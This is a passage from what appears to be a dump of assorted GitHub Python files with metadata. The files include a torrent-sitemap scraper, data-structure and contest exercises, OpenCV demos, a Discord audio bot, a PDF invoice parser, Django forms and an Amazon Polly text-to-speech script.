set()\ncategory_list.add('TV')\ncategory_list.add('Movies')\n\n\ndef scrape_mblock(movie_block):\n movieb_data = {}\n\n divs = movie_block.findAll('div', {'class', 'dltorrent'})\n magnets = set()\n for div in divs:\n As = div.findAll('a')\n for a in As:\n href = a.get('href')\n if href.startswith('magnet:'):\n magnets.add(href)\n\n try:\n name = movie_block.find('div', {'id': 'content'}).find('h1').text\n movieb_data['name'] = name\n info = guessit.guessit(name)\n movieb_data['title'] = info['title']\n except:\n return False, None\n\n try:\n movieb_data['seeds'] = str(\n movie_block.find('span', {'class': 'greenish'}).text)\n except:\n movieb_data['seeds'] = None\n\n try:\n movieb_data['leeches'] = str(\n movie_block.find('span', {'class': 'reddish'}).text)\n except:\n movieb_data['leeches'] = None\n\n return movieb_data, list(magnets)\n\n\ndef scrape_this(root_url, ll, sitemap_file):\n\n pages = []\n to_scrap = []\n\n for l in ll:\n url = root_url % (l,)\n to_scrap.append(url)\n\n print(\"Going over XMLs...\")\n for url in help_routines.sample(to_scrap, parser.getint('limetorrents', 'to_scrap')): #XXX to_scrap\n print(url)\n source = requests.get(url).text\n soup = bs4.BeautifulSoup(source, 'xml')\n sitemap = soup.findAll('loc')\n for loc in sitemap:\n pages.append(loc.text)\n\n print(\"going over pages\", len(pages))\n\n hash_re = re.compile('btih:([0-9|A-Z|a-z]*)&.*')\n\n client = pymongo.MongoClient()\n cdb = client['magnets']\n\n mondb = cdb.magnets\n err_count = 0\n for url in help_routines.sample(pages, parser.getint('limetorrents', 'pages')): #XXX pages\n\n print(url)\n source = requests.get(url).text\n soup = bs4.BeautifulSoup(source, 'html.parser')\n\n map, magnets = scrape_mblock(soup)\n if not map:\n continue\n\n for magnet in magnets:\n m = hash_re.search(magnet)\n hash = m.group(1).upper()\n map['_id'] = hash\n map['magnet'] = magnet\n try:\n mondb.insert_one(map)\n except pymongo.errors.DuplicateKeyError:\n err_count += 1\n\n 
time.sleep(0.1)\n\nscrape_this(\"https://limetorrents.info/sitemaps/allsitemap%d.xml\", range(1, 328), 'limetorrents.pages.txt')\n\n","repo_name":"dineshgayathri/indexsample","sub_path":"crawler.limetorrents.py","file_name":"crawler.limetorrents.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4516988180","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def __str__(self):\n return str(self.data)\n\nclass Queue:\n def __init__(self):\n self.items = []\n\n def is_empty(self):\n return len(self.items) == 0\n\n def size(self):\n return len(self.items)\n\n def enqueue(self, data):\n self.items.append(data)\n\n def dequeue(self):\n if not self.is_empty():\n return self.items.pop(0)\n\nclass BST:\n def __init__(self):\n self.root = None\n\n def insert(self, data):\n if self.root is None:\n self.root = Node(data)\n else:\n curr = self.root\n while True:\n if data < curr.data:\n if curr.left is None:\n curr.left = Node(data)\n break\n curr = curr.left\n else:\n if curr.right is None:\n curr.right = Node(data)\n break\n curr = curr.right\n return self.root\n\n def max(self):\n if self.root is None:\n return\n curr = self.root\n while curr.right is not None:\n curr = curr.right\n return curr.data\n\n def min(self):\n if self.root is None:\n return\n curr = self.root\n while curr.left is not None:\n curr = curr.left\n return curr.data\n\n def mult(self, k, multiplier): # traverse then multiply\n q = Queue()\n q.enqueue(self.root)\n while not q.is_empty():\n curr = q.dequeue()\n if curr.data > k:\n curr.data = curr.data*multiplier\n if curr.left is not None:\n q.enqueue(curr.left)\n if curr.right is not None:\n q.enqueue(curr.right)\n\n def print_tree(self, node, level=0):\n if node is not None:\n self.print_tree(node.right, level + 1)\n print(' ' * level, node)\n self.print_tree(node.left, level + 1)\n\n\nif __name__ == '__main__':\n T = BST()\n inp = input('Enter Input : ').split('/')\n lst = list(map(int, inp[0].split()))\n k = int(inp[1])\n # print(lst, k)\n root = None\n for item in lst:\n root = T.insert(item)\n T.print_tree(root)\n print('--------------------------------------------------')\n T.mult(k, 3)\n T.print_tree(root)","repo_name":"ApexTone/DataStructAlgo-Grader-KMITL","sub_path":"Week7/MultiplyTree.py","file_name":"MultiplyTree.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"34247694012","text":"# https://atcoder.jp/contests/abc175/tasks/abc175_b\n\nn = int(input())\nl = list(map(int, input().split()))\n\nans = 0\nfor i in l:\n for j in l:\n for k in l:\n h = [i, j, k]\n if i != j and i != k and j != k:\n h.sort()\n if h[0] + h[1] > h[2]:\n ans += 1\nprint(ans // 6)\n","repo_name":"hy-sksem/AtCoder","sub_path":"ABC/175_B_MakingTriangle.py","file_name":"175_B_MakingTriangle.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39671290902","text":"rule1 = (\"p= Manolo es cariñoso\", \"q= Manolo es amable\")\r\n\r\nfact1 = (\"p\",)\r\n#definir la meta \r\ngoal1 = (\"q\",)\r\n\r\n#Combinar la regla y el hecho para comprobar el gol\r\nif set(rule1).issubset(set(fact1)):\r\n print(\"La regla y el hecho combinados cumplen el objetivo\")\r\nelse:\r\n print(\"La regla y el hecho combinados no cumplen el 
objetivo\")\r\n","repo_name":"TuGorditoSensualon16/PythonPracticas","sub_path":"cláusulasdeHorn.py","file_name":"cláusulasdeHorn.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32769226896","text":"import cv2\n\nimagen = cv2.imread(\"img.png\")\n\n#Redimensionar\n# Sintaxis red = cv2.resize(imagen, fx=factor en x, fy=factor en y, tipo de interpolacion)\n\n#Red 1\nred1 = cv2.resize(imagen, None, fx=1.5, fy=1.5)\n\n#Red 2\nred2 = cv2.resize(imagen, None, fx=1.5, fy=1.5, interpolation= cv2.INTER_AREA)\n\n#Red 3\nred3 = cv2.resize(imagen, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\n\n#Red 4\nancho = 400\nalto = 500\ntam = (ancho,alto)\nred4 = cv2.resize(imagen, tam, interpolation=cv2.INTER_CUBIC)\n\n#Mostramos el recorte\ncv2.imshow('Imagen original', imagen)\ncv2.imshow('Redimension 1', red1)\ncv2.imshow('Redimension 2', red2)\ncv2.imshow('Redimension 3', red3)\ncv2.imshow('Redimension 4', red4)\n\ncv2.waitKey(0)\n","repo_name":"MarianAlpha/VisionArtificial","sub_path":"Clase 2/Redimencianar.py","file_name":"Redimencianar.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29082347869","text":"def solution(n, a , b):\n tmp = a //2 + a%2\n tmp2 = b //2 + b%2\n cnt = 1\n while tmp != tmp2:\n cnt= cnt + 1\n tmp = tmp //2 + tmp%2\n tmp2 = tmp2 //2 + tmp2%2\n if tmp == tmp2:\n return cnt\n return cnt\n","repo_name":"algorithm-maintain-box/Programers","sub_path":"sejin/level_2/예상 대진표.py","file_name":"예상 대진표.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7361905274","text":"# For when you can't tell which Pico you're connected to...\n\nfrom machine import Pin\nfrom time import sleep\n\ndef blink(times: int = 1):\n print(f\"Blinking LED {times} times\")\n for _ in range(times):\n led = Pin(\"LED\", Pin.OUT)\n led.on()\n sleep(1)\n led.off()\n\n\nblink()","repo_name":"Jcros214/QuizBox0.5_micropython","sub_path":"blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74237778170","text":"import audioop, collections, threading\nimport sounddevice as sd\nimport asyncio, discord\nimport logging\n\nimport settings as settingsModule\n\nlog = logging.getLogger(__name__)\n\nclass MockFile(discord.AudioSource):\n \"\"\"\n This is a mock file that will buffer output from a sounddevice recording.\n If not playing, output will not buffered to save RAM\n \"\"\"\n def __init__(self):\n self.buffer = collections.deque(bytearray(), maxlen=960000) # Limit to ~100kB just in case it's left playing\n self.event = threading.Event()\n self.rateData = None\n print(\"MockFile Initiated\")\n\n self.playing = False # If this is false, nothing is actually buffered\n\n def play(self):\n \"\"\" Begins recording audio and clears the buffer \"\"\"\n print(\"Playing\")\n self.playing = True\n self.buffer.clear() # Clear any existing buffer so there is as little latency as possible\n\n def stop(self):\n \"\"\" Stops recording from the buffer \"\"\"\n print(\"Stopping\")\n self.playing = False\n\n def callback(self, indata, frames, time, status):\n \"\"\" callback function to give to the sounddevice \"\"\"\n self.write(indata.copy(order=\"C\"))\n\n def read(self, numBytes: int or 
None=3840) -> bytes:\n \"\"\"\n A stream player may read from this to get a sample of the audio\n NOTE: This must return bytes, not a bytearray because the encoder silently fails if you pass anything but bytes\n :param numBytes: The number of bytes to read. Note: If the number of bytes requested is not a multiple of byte width * channels, data will be malformed\n :return: A bytes object containing the oldest requested bytes from the buffer\n \"\"\"\n if not self.playing: # If a read is requested but we're paused, play to avoid deadlock\n self.play()\n if type(numBytes) == int and numBytes < 0:\n numBytes = None\n toRet = bytearray() # Buffer to put desired bytes into\n while True:\n try:\n toRet.append(self.buffer.popleft())\n if numBytes and len(toRet) >= numBytes:\n return bytes(toRet)\n except IndexError: # Occurs when there's a pop from an empty buffer\n if not numBytes:\n return bytes(toRet)\n else: # If we don't have the requisite number of bytes, wait for more to be written\n #print(\"Out of bytes and waiting!\")\n self.event.clear() # This will likely be set originally, so clear it to indicate we are waiting for more bytes\n self.event.wait()\n\n def write(self, data):\n \"\"\"\n Writes binary int16 data to the buffer. Buffer is FIFO. Does not write if not playing\n :param data: The binary data to extend the buffer by.\n \"\"\"\n #print(\"Writing data!\", len(data), len(self.buffer))\n # Arguments are:\n # data: Binary PCM fragment to change sample rate of\n # width: byte width - We set our dtype in recording to int16 because discord expects PCM_16. 16 bits = 2 bytes\n # channels: How many channels per frame. Discord expects stereo = 2 and our audio device has 2, so it's good\n # input rate: Our audio device records at 44.1 kHz\n # output rate: discord expects 48 kHz\n # stream data: ratecv maintains some state between calls to this, so we record this data for it.\n data, self.rateData = audioop.ratecv(data, 2, 2, 44100, 48000, self.rateData)\n if self.playing: # Note, we do the audioop.ratecv regardless to update rateData\n self.buffer.extend(data)\n self.event.set()\n\nsettings = settingsModule.discord\nsettings.newSetting(\n {\n \"id\": \"botToken\",\n \"hidden\": True\n },\n {\n \"id\": \"gamePlaying\",\n \"type\": dict,\n \"default\": {\"name\": \"We playin DnD Bois!\", \"type\": 0}\n },\n {\n \"id\": \"voiceChannel\",\n \"type\": int,\n \"hidden\": True\n },\n {\n \"id\": \"commandChar\",\n \"default\": \"^\",\n \"verify\": lambda x: len(x) == 1\n },\n)\n\n\nclass MyClient(discord.Client):\n defaultIntents = discord.Intents.default()\n def __init__(self, audioFile: MockFile, recordStream, *args, **kwargs):\n super().__init__(*args, intents=self.defaultIntents, **kwargs)\n self.audioFile = audioFile\n self.recordStream = recordStream\n self.channel: discord.VoiceChannel = None # Voice channel that we are to connect to\n self.vc: discord.VoiceClient = None # Voice Client object of the currently connected channel\n\n def _callCoro(self, coro):\n asyncio.get_event_loop().call_soon_threadsafe(asyncio.ensure_future(coro))\n\n async def updateChannel(self, channel: discord.VoiceChannel):\n if type(channel) == int:\n channel = self.get_channel(channel)\n if not channel: # Indicates the channel no longer exists, or we have no permissions\n return log.error(\"Channel no longer exists to join\")\n else: # If we aren't updating from string, change our saved string\n settings[\"voiceChannel\"] = channel.id\n settingsModule.save()\n self.channel = channel\n if self.vc and self.vc.channel 
!= channel:\n await self.vc.move_to(channel)\n else:\n await self.createVoiceClient()\n\n async def on_ready(self):\n log.info(f'Logged on as {self.user}!'.format(self.user))\n #if not discord.opus.is_loaded():\n # discord.opus.load_opus('libopus-0.x86.dll')\n if settings[\"voiceChannel\"]: # If we have a saved voice channel, connect immediately\n log.info(\"Connecting to stored voice channel\")\n await self.updateChannel(settings[\"voiceChannel\"])\n else:\n log.info(\"No voice channel saved, type '{}initialize' while connected to a voice channel\".format(settings[\"commandChar\"]))\n\n await self.changeGame(**settings[\"gamePlaying\"], save=False)\n\n async def on_message(self, message):\n if message.content.startswith(settings[\"commandChar\"]):\n if message.content[1:] == \"initialize\":\n if message.author.channel:\n log.info(\"Set new voice channel for future use:\"+message.author.channel.id)\n await message.channel.send(\"New Voice Channel Set!\")\n await self.updateChannel(message.author.channel)\n else:\n log.info(\"Tried setting new voice channel, but user was not connected to one\")\n await message.channel.send(\"You must be connected to a voice channel to initialize!\")\n elif message.content[1:] == \"connect\":\n await self.createVoiceClient()\n elif message.content[1:] == \"disconnect\":\n await self.disconnectVoiceClient()\n elif message.content[1:] == \"pause\":\n self.pause()\n elif message.content[1:] == \"set game\":\n log.info(\"Setting new presence\")\n await message.channel.send(\"Waiting for new game title\")\n newName = await self.wait_for(\"message\", timeout=10, check=lambda m: message.author == m.author)\n newName = newName.content if newName else settings[\"gamePlaying\"][\"name\"]\n await self.changeGame(newName)\n\n async def changeGame(self, name=None, type=discord.ActivityType.playing, save=True):\n log.info(f\"Changing game presence to '{name}' with type {type}\")\n settings[\"gamePlaying\"] = {\"name\": name, \"type\": int(type)}\n if name:\n await self.change_presence(activity=discord.Activity(name=name, type=type))\n if save:\n settingsModule.save()\n\n def async_changeGame(self, *args, **kwargs):\n \"\"\" Puts this into the loop and returns \"\"\"\n self._callCoro(self.changeGame(*args, **kwargs))\n\n async def createVoiceClient(self):\n if not self.vc or not self.vc.is_connected():\n log.debug(\"Creating new voice client!\")\n log.debug(\"Awaiting voice channel\")\n self.vc = await self.channel.connect()\n log.debug(\"Voice channel acquired, making player\")\n self.vc.play(self.audioFile)\n log.debug(\"Starting player!\")\n\n async def disconnectVoiceClient(self):\n if self.vc and self.vc.is_connected():\n log.info(\"Disconnecting voice client\")\n await self.vc.disconnect()\n self.audioFile.stop() # Stop recording audio, so it's crisp when we read again\n\n def pause(self):\n if self.vc and self.vc.is_connected():\n if self.vc.is_playing():\n log.info(\"Pausing Self\")\n self.vc.pause()\n self.audioFile.stop()\n else:\n log.info(\"Resuming Self\")\n self.vc.resume() # Should automatically start audioFile when we first read\n\n def async_logout(self):\n self._callCoro(self.close())\n\ndef start():\n print(discord.version_info)\n\n # Load settings\n settingsModule.loadInitial()\n if not settings[\"botToken\"]:\n import os, sys, webbrowser\n print(\"Bot token not found! Please follow the next instructions to make a new bot. Press enter when ready (or press 'n' to skip)\")\n val = input(\"... 
\")\n if val != \"n\":\n webbrowser.open(\"https://twentysix26.github.io/Red-Docs/red_guide_bot_accounts/#creating-a-new-bot-account\")\n print(\"Please copy the bot token. A file will open, paste it there, save, and close.\")\n print(\"Press enter when ready\")\n input(\"... \")\n filename = settingsModule.getFile(\"temp.txt\")\n os.system(f\"notepad {filename}\")\n with open(filename) as file:\n settings[\"botToken\"] = file.read().strip()\n os.remove(filename)\n settingsModule.save()\n\n cableName, cableInputChannels = \"CABLE Output (VB-Audio Virtual Cable)\", 2\n\n log.debug(\"Making input stream\")\n log.debug(f\"Searching for cable with name '{cableName}' and input channels #{cableInputChannels}\")\n mockFile = MockFile() # Make our mock file buffer. It will be ignoring input until specifically told to play\n for deviceNum, device_info in enumerate(sd.query_devices()):\n if device_info[\"name\"] == cableName and device_info[\"max_input_channels\"] == cableInputChannels:\n break\n else: # If we do not break - e.g. we did not find the audio cable\n string = \"VB Audio Cable Not Found! Did you install the drivers correctly?\"\n log.error(string)\n raise RuntimeError(string)\n\n stream = sd.InputStream(samplerate=int(device_info['default_samplerate']), device=deviceNum,\n channels=2, callback=mockFile.callback, dtype=\"int16\")\n stream.start() # Begin recording to the mock file. Note: This cannot be called in any thread but the main python thread. Otherwise the underlying library errors\n log.info(\"Started cable input stream\")\n\n\n client = MyClient(mockFile, stream)\n clientLoop = asyncio.new_event_loop()\n\n def run():\n asyncio.set_event_loop(clientLoop)\n client.run(settings[\"botToken\"])\n\n thread = threading.Thread(target=run, daemon=True)\n thread.start()\n\n return client, thread, clientLoop # Return these for use with other parts of the program","repo_name":"civilwargeeky/DiscordDMHelper","sub_path":"src/botDiscord.py","file_name":"botDiscord.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"6364404855","text":"import cv2\nimport numpy as np\n\n# OpenCV的Canny边缘检测算法\n# 1,使用高斯滤波平滑图像,减少图像中噪声。\n# 2,计算图像中每个像素的梯度方向和幅值。\n# 3,应用非极大值抑制算法消除边缘检测带来的杂散响应。\n# 4,应用双阈值法划分强边缘和弱边缘。\n# 5,消除孤立的弱边缘。\nimg = cv2.imread(\"../images//planet_glow.jpg\", cv2.IMREAD_GRAYSCALE)\ncanny_img = cv2.Canny(img, 200, 300)\ncv2.imshow(\"canny\", canny_img)\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"L-Jac/image-processing","sub_path":"chapter03/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15926426739","text":"# 数据前处理的代码重复部分略去\n# 构建CART决策树模型\nfrom sklearn.tree import DecisionTreeClassifier\n\ntreefile = '/Users/Mac/Desktop/tree.pkl'\ntree = DecisionTreeClassifier()\ntree.fit(train[:,:3],train[:,3])\n\nfrom sklearn.externals import joblib\njoblib.dump(tree, treefile) # 这里使用joblib模块来保存模型数据\n\nfrom cm_plot import *\ncm_plot(train[:,3], tree.predict(train[:,:3])).show()\n\n\n# 数据前处理部分略去\n#模型测试\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nfrom sklearn.externals import joblib\n\ntree = joblib.load('/Users/Mac/Desktop/tree.pkl')\n\nfpr, tpr, thresholds = roc_curve(test[:,3], tree.predict_proba(test[:,:3])[:,1],pos_label=1)\nplt.plot(fpr, tpr, linewidth = 2, label = 'ROC of CART')\nplt.xlabel('False Positive Rate')\nplt.ylabel('True 
Positive Rate')\nplt.ylim(0, 1.05)\nplt.xlim(0, 1.05)\nplt.legend(loc=4)\nplt.show()\n","repo_name":"dongyingdepingguo/Practice","sub_path":"电力窃漏用户自动识别/CART_model_test.py","file_name":"CART_model_test.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"78"} +{"seq_id":"74176797053","text":"import re\nimport pdfplumber\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport csv\n\n\"\"\"\ndate = report[1]\nhawb = report[2]\nmawb = report[3]\ndest = report[4]\nchargeable = report[5]\ncharges = report[6]\nunit_price = report[7]\npackages = report[8]\nweight = report[9]\n\"\"\"\ndef read_pdf_as_text(file_name):\n pdf = pdfplumber.open(file_name)\n page = pdf.pages[0]\n text = page.extract_text()\n pdf.close()\n return text\n\ndef parse_report(text):\n d = {}\n\n lines = text.splitlines()\n date_and_invoice = lines[2].split()\n d[1] = date_and_invoice[0]\n d[2] = date_and_invoice[1]\n \n # AWB number\n awb_line = lines[4]\n d[3] = awb_line.split()[-1]\n \n # Destination\n dest_line = \"\"\n \n desc = \"\"\n x_ray_line = \"\"\n hawb_line = \"\"\n for i, l in enumerate(lines):\n if 'X-RAY' in l:\n x_ray_line = l.split()\n elif 'HAWB' in l:\n hawb_line = l.split()\n elif 'Transport' in l:\n desc = l.split()\n elif 'Origin Destination Currency' in l:\n dest_line = lines[i+1].split()\n \n if desc:\n # 5 6 7 10 11\n d[10] = desc[2]\n d[11] = desc[6]\n d[5] = desc[7]\n d[6] = desc[8]\n d[7] = desc[-1]\n \n if dest_line:\n d[4] = ' '.join(dest_line[-3:-1])\n\n \n if x_ray_line:\n d[8] = x_ray_line[-1]\n \n if hawb_line:\n d[9] = hawb_line[-1]\n \n # total\n total_line = lines[-1].split()\n d[12] = total_line[1]\n \n return d\n \ndef run():\n text = read_pdf_as_text('input/invoice_210203V5802.pdf')\n print(text)\n report = parse_report(text)\n print(report)\n\ndef eval_folder(folder='input'):\n onlyfiles = [join(folder, f) for f in listdir(folder) if isfile(join(folder, f))]\n reports = []\n for f in onlyfiles:\n print('Processing..', f)\n report = parse_report(read_pdf_as_text(f))\n print(report)\n reports.append(report)\n \n return reports\n\ndef csv_writer(reports):\n with open('output/result.csv', \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=',')\n # write headers\n header = ['日期','Invoice No.','总运单号','清关公司','Chargable Weight','单价',\n 'Freight', 'X-RAY', '额外费用', '麻袋数', '毛重', '费用']\n writer.writerow(header)\n \n # contents\n for report in reports:\n l = []\n for i in range(1, 13):\n if i in report:\n l.append(report[i])\n else:\n l.append('N/A')\n \n # writerow requires a list\n writer.writerow(l)\n \nreports = eval_folder()\ncsv_writer(reports)\n\n#run()","repo_name":"gigimushroom/PDF-to-excel","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17359895465","text":"from datetime import timedelta\n\nfrom django import forms\nfrom django.utils import timezone\n\nfrom .dates import date_name\nfrom .models import Meal\n\n\nINGREDIENT_CHOICES = (\n (\"have\", \"Got it\"),\n (\"need\", \"Need it\"),\n)\n\n\nclass InvalidFormError(Exception):\n \"\"\"Error for attempting to access properties on an invalid form.\"\"\"\n\n pass\n\n\nclass IngredientOrderForm(forms.Form):\n def __init__(self, *args, **kwargs):\n ingredients = kwargs.pop(\"ingredients\")\n super(IngredientOrderForm, self).__init__(*args, **kwargs)\n for ingredient in 
ingredients:\n self.fields[ingredient.name] = forms.ChoiceField(\n choices=INGREDIENT_CHOICES, widget=forms.RadioSelect()\n )\n\n self._ingredients_by_name = {i.name: i for i in ingredients}\n\n @property\n def needed(self):\n if not self.is_valid():\n raise InvalidFormError(\"Ingredients form is not valid\")\n return [\n self._ingredients_by_name[i]\n for i, status in self.cleaned_data.items()\n if status == \"need\"\n ]\n\n @property\n def got(self):\n if not self.is_valid():\n raise InvalidFormError(\"Ingredients form is not valid\")\n return [\n self._ingredients_by_name[i]\n for i, status in self.cleaned_data.items()\n if status == \"have\"\n ]\n\n\ndef week_choices(today, include=None):\n \"\"\"Return available scheduling choices for the next week.\n\n Include a \"None\" option, to remove an already-scheduled date.\n\n The `include` argument will make sure that a specified date is in the list\n of choices, for forms where a date outside the usual range is already\n scheduled.\n \"\"\"\n unset_choice = (\"\", \"-- Unscheduled --\")\n days = {today + timedelta(days=offset) for offset in range(7)}\n if include is not None:\n days.add(include)\n\n return [unset_choice] + [\n (day.isoformat(), date_name(day, today=today)) for day in sorted(days)\n ]\n\n\nclass MealDateForm(forms.ModelForm):\n class Meta:\n model = Meal\n fields = [\"date\"]\n\n def __init__(self, *args, **kwargs):\n today_func = kwargs.pop(\"today_func\", timezone.localdate)\n instance = kwargs[\"instance\"]\n prefix = str(instance.id)\n super(MealDateForm, self).__init__(*args, **kwargs, prefix=prefix)\n\n # We need to set this up explicitly on init so that the the date\n # choices are calculated each time, rather than baked in at load time.\n date_widget = forms.Select(\n choices=week_choices(today=today_func(), include=instance.date)\n )\n date_field = forms.DateField(required=False, widget=date_widget)\n date_field.label = \"\"\n self.fields[\"date\"] = date_field\n","repo_name":"dhwthompson/trencher","sub_path":"plan/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73587469372","text":"#!/usr/bin/env python\nimport pygame\nfrom pygame.locals import (\n FULLSCREEN,\n DOUBLEBUF,\n )\n\n\nwhite = (255,) * 3\ndark_green = 25, 85, 45\nlight_green = 200, 255, 200\n\nfood_image_file = 'data/spider_plant.png'\nbug_image_file = 'data/bug0.png'\n\nSCREEN_WIDTH, SCREEN_HEIGHT = SCREEN_DIMENSIONS = 800, 600 # 1024, 768\n\n\nscreen = pygame.display.set_mode(SCREEN_DIMENSIONS, DOUBLEBUF)\nscreen.fill(light_green)\n\nfood_image = pygame.image.load(food_image_file)\nbug_image = pygame.image.load(bug_image_file)\n\nscreen.blit(food_image, (133, 100))\nscreen.blit(bug_image, (100, 90))\n\npygame.display.flip()\n\nraw_input('Press enter to quit..')\n","repo_name":"calroc/sbonu","sub_path":"pg_sbonu.py","file_name":"pg_sbonu.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28309050885","text":"import tokenize\nimport sympy\nfrom sympy import Integer\nfrom sympy import Float\nfrom sympy import Symbol\n\n\n# Exercise 1\ninput_value = input('Please enter an argument of any type in Python format:')\n\n\n# Function to detect value (argument) type\ndef arg_type(value):\n value_type = type(value)\n\n return value_type\n\n# Parsing argument from input\ntry:\n sympy_value = 
sympy.parsing.sympy_parser.parse_expr(input_value)\nexcept tokenize.TokenError:\n print('Invalid argument, please enter an argument of any type in Python format!')\nexcept SyntaxError:\n print('It is not an argument! please enter an argument of any type in Python format!')\nelse:\n complete_output = arg_type(sympy_value)\n print(f'Type of your value is: {complete_output}')\n\n\n# Exercise 2\ninput_value = input('Please enter argument of any type in Python format:')\n\n\n# Function to make from value to float or return float 0\ndef arg_float(value):\n try:\n float(value)\n except TypeError:\n output_value = float(0)\n\n return output_value\n else:\n output_value = float(value)\n\n return output_value\n\n\n# Parsing argument from input\ntry:\n sympy_value = sympy.parsing.sympy_parser.parse_expr(input_value)\nexcept tokenize.TokenError:\n print('Invalid argument, please enter an argument of any type in Python format!')\nexcept SyntaxError:\n print('It is not an argument! please enter an argument of any type in Python format!')\nelse:\n complete_output = arg_float(sympy_value)\n if complete_output == float(0):\n print(f'Python cannot make float from this value, so we return: {complete_output}')\n else:\n print(f'Python successfully maid float from your value, it is: {complete_output}')\n\n\n# Exercise 2\ninput_value1 = input('Please enter a 1st argument of any type in Python format:')\ninput_value2 = input('Please enter a 2nd argument of any type in Python format:')\n\n\n# Final function with boolean and types\ndef two_arg(value1, value2):\n value_type1 = type(value1)\n value_type2 = type(value2)\n\n int_bool1 = isinstance(value1, Integer)\n float_bool1 = isinstance(value1, Float)\n int_bool2 = isinstance(value2, Integer)\n float_bool2 = isinstance(value2, Float)\n\n symbol_bool1 = isinstance(value1, Symbol)\n str_bool1 = isinstance(value_type1, str)\n symbol_bool2 = isinstance(value2, Symbol)\n str_bool2 = isinstance(value_type2, str)\n\n if (int_bool1 or float_bool1) and (int_bool2 or float_bool2):\n math_diff = value1 - value2\n\n return math_diff\n\n elif (str_bool1 or symbol_bool1) and (str_bool2 or symbol_bool2):\n str_concat = str(value1) + str(value2)\n\n return str_concat\n\n elif (str_bool1 or symbol_bool1) and not (str_bool2 or symbol_bool2):\n output_dict = {str(value1): value2}\n\n return output_dict\n\n else:\n output_tuple = (value1, value2)\n\n return output_tuple\n\n\n# Parsing value (argument) from input\ntry:\n sympy_value1 = sympy.parsing.sympy_parser.parse_expr(input_value1)\n sympy_value2 = sympy.parsing.sympy_parser.parse_expr(input_value2)\nexcept tokenize.TokenError:\n print('Invalid Python argument, please enter any argument in Python format!')\nexcept SyntaxError:\n print('It is not a Python argument! 
Please enter any argument in Python format!!!')\nelse:\n print(f'Your output is: {two_arg(sympy_value1, sympy_value2)}')\n","repo_name":"Regato/AQAHillel","sub_path":"HW5/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32759559109","text":"#!/usr/bin/python\n# encoding=utf8\nimport codecs\nimport datetime\nimport os\nimport re\nimport shutil\nimport sys\nimport os\nimport boto3\n\ndefaultRegion = 'us-east-1'\ndefaultUrl = 'https://polly.us-east-1.amazonaws.com'\n\nclass MyString:\n def __init__(self, string):\n self.string = string\n def __div__(self, div):\n l = []\n for i in range(0, len(self.string), div):\n l.append(self.string[i:i+div])\n return l\n\ndef connectToPolly(regionName=defaultRegion, endpointUrl=defaultUrl):\n return boto3.client('polly', region_name=regionName, endpoint_url=endpointUrl)\n\ndef speak(polly, text, path):\n format = 'mp3'\n voice = 'Brian'\n resp = polly.synthesize_speech(OutputFormat=format, Text=text, VoiceId=voice)\n soundfile = open(path, 'w')\n soundBytes = resp['AudioStream'].read()\n soundfile.write(soundBytes)\n soundfile.close()\n # os.system('afplay /tmp/sound.mp3') # Works only on Mac OS, sorry\n # os.remove('/tmp/sound.mp3')\n\npolly = connectToPolly()\nsource = './shows/'\nfor root, dirs, posts in os.walk(source):\n for post in posts:\n post_full_path = os.path.join(source, post)\n post = codecs.open(post_full_path, 'r')\n post_readable = post.read();\n m = MyString(post_readable)\n break_up = m/1500\n new_post = break_up[0]\n new_path = post_full_path.replace('./shows/', './dist/').replace('.txt', '.mp3')\n\n\n speak(polly, new_post, new_path)\n\n\n\n#\n# polly = connectToPolly()\n# # icelandicString =\n# speak(polly, \"Hello world, I'm Polly. Or Brian. Or anyone you want, really.\")\n# # speak(polly, icelandicString.decode('utf8'), voice='Karl')\n","repo_name":"terrillo/Archives","sub_path":"2017-04/the-anchoring/source/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20258537240","text":"import sys\nread = lambda : sys.stdin.readline()\n\nwhile 1:\n w,h = map(int,input().split())\n matrix = [list(map(int,list(read().strip()))) for _ in range(w)]\n ans = []\n\n def dfs(x,y):\n\n matrix[x][y] = 0\n n_x = [1, 